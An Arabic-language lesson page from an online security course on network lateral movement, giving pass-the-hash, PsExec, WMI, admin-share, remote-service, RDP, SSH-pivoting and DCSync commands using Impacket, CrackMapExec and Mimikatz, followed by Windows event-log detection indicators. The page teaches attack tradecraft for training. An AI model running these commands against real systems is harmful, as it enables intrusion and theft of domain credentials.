Cyber Security Academy · درس

تقنيات الحركة الجانبية

تنقّل عبر الشبكات باستخدام WMI وPsExec وWinRM ومشاركات SMB من دون إطلاق تنبيهات

الدرس 3 من 413 خطوة

تقنيات الحركة الجانبية درس مجاني في Cyber Security Academy على CoddyKit. هذا هو الدرس 3 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Cyber Security Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.

ما المقصود بالحركة الجانبية؟

الحركة الجانبية هي مجموعة التقنيات التي يستخدمها المهاجمون للانتقال تدريجيًا عبر الشبكة بعد الاختراق الأولي، بالتمحور من موطئ القدم الأول نحو أهداف أعلى قيمة مثل وحدات التحكم بالمجال وقواعد البيانات وأنظمة النسخ الاحتياطي.

تمرير التجزئة (PtH)

تتيح مصادقة Windows NTLM استخدام تجزئة كلمة المرور مباشرة بدلًا من كلمة المرور بنصها الصريح. ويستطيع المهاجم الذي استخرج تجزئات NTLM المصادقة على أنظمة أخرى من دون كسر التجزئة.

# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5

# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASH

تمرير التذكرة (PtT)

يمكن استخراج تذاكر Kerberos (TGT أو TGS) من الذاكرة واستيرادها للمصادقة بصفة حامل التذكرة. وتزوّر هجمات Golden Ticket تذاكر TGT باستخدام تجزئة KRBTGT، مما يوفر وصولًا غير محدود إلى نطاق Kerberos.

التنفيذ عن بُعد: PSExec

ينفذ psexec (من Sysinternals وImpacket) أوامر على مضيفات Windows بعيدة عبر مشاركات SMB الإدارية. ويتطلب بيانات اعتماد المسؤول. وينشئ ملف خدمة ثنائيًا على الهدف.

impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexec

الحركة الجانبية عبر WMI

تتيح Windows Management Instrumentation تنفيذ التعليمات البرمجية عن بُعد من دون إنشاء ملفات يمكن للعديد من الأدوات اكتشافها:

# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")

SMB والمشاركات الإدارية

تتيح مشاركات Windows الإدارية (C$ وADMIN$ وIPC$) الحركة الجانبية باستخدام بيانات اعتماد المسؤول:

# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5

الخدمات عن بُعد: sc وat

إنشاء خدمات أو مهام مجدولة على أنظمة بعيدة:

# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc

# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"

RDP والجلسات التفاعلية

يوفر RDP (بروتوكول سطح المكتب البعيد، المنفذ 3389) وصولًا تفاعليًا كاملًا. يستخدم المهاجمون RDP ببيانات اعتماد مسروقة. الدفاع: قصر RDP على خوادم القفز، واشتراط NLA، وتسجيل جميع الجلسات.

# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5

SSH بوصفه وسيلة للحركة الجانبية

في بيئات Linux، تتيح مفاتيح SSH أو بيانات الاعتماد المسروقة الحركة الجانبية. وتتيح إساءة استخدام إعادة توجيه الوكيل التمحور عبر المضيفات المخترقة. وتعيد أنفاق SSH توجيه المنافذ للوصول إلى أنظمة يتعذر الوصول إليها بطريقة أخرى.

# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_host

نسخ Active Directory المتماثل (DCSync)

تستغل DCSync نسخ AD المتماثل لسحب تجزئات كلمات المرور مباشرة من DC من دون تشغيل تعليمات برمجية عليه — وتتطلب امتياز DS-Replication-Get-Changes-All:

# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgt

اكتشاف الحركة الجانبية

مؤشرات الاكتشاف:

  • الحدث 4624 (تسجيل الدخول) مع تسجيلات دخول غير معتادة من النوع 3 (شبكية)
  • إنشاء خدمات على مضيفات بعيدة (الحدث 7045)
  • اتصالات SMB بين محطات العمل
  • إنشاء عمليات WMI على مضيفات بعيدة
  • سلوك غير طبيعي للحسابات (تسجيل دخول المستخدم من أجهزة متعددة)

تحقق سريع: الحركة الجانبية

ما التقنية التي تتيح للمهاجم المصادقة على أنظمة Windows باستخدام تجزئة NTLM ملتقطة من دون كسرها؟

مراجعة الدرس

تستخدم الحركة الجانبية بيانات الاعتماد والبروتوكولات المخترقة للانتشار عبر الشبكة. وتشمل التقنيات الأساسية: تمرير التجزئة (إعادة استخدام تجزئة NTLM)، وتمرير التذكرة (Kerberos)، وPSExec وWMI وSMB للتنفيذ عن بُعد، وDCSync لجمع بيانات اعتماد المجال. ويشمل الاكتشاف تسجيلات الدخول الشبكية غير المعتادة (الحدث 4624)، وإنشاء الخدمات عن بُعد (الحدث 7045)، وحركة SMB بين محطات العمل.

البدء مجانًا

تعلم Cyber Security Academy مع معلم ذكاء اصطناعي — مجانًا

اكتب وقم بتشغيل أكوادك الفعلية في المتصفح، واحصل على مساعدة فورية من معلم ذكاء اصطناعي متاح 24/7، واستمر من حيث توقفت على الويب أو في التطبيق.

الدورات
76
الدروس
303

الأسئلة الشائعة

هل درس «تقنيات الحركة الجانبية» مجاني؟

نعم — نص درس «تقنيات الحركة الجانبية» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Cyber Security Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.

ماذا ستتعلم في «تقنيات الحركة الجانبية»؟

تنقّل عبر الشبكات باستخدام WMI وPsExec وWinRM ومشاركات SMB من دون إطلاق تنبيهات تتمرن على Cyber Security Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.

هل أحتاج إلى خبرة سابقة لأبدأ Cyber Security Academy؟

لا تُشترط خبرة سابقة. Cyber Security Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 3 من أصل 4.

كم من الوقت يستغرق درس «تقنيات الحركة الجانبية»؟

معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.

هل يمكنني كتابة وتشغيل أكواد في درس Cyber Security Academy هذا؟

نعم. كل درس في Cyber Security Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.

جميع الدروس في هذه الدورة

  1. أطر C2: Cobalt Strike وSliver
  2. الثنائيات المستغلة محليًا (LOLBins)
  3. تقنيات الحركة الجانبية
  4. كتابة تقارير الفريق الأحمر
← العودة إلى Cyber Security Academy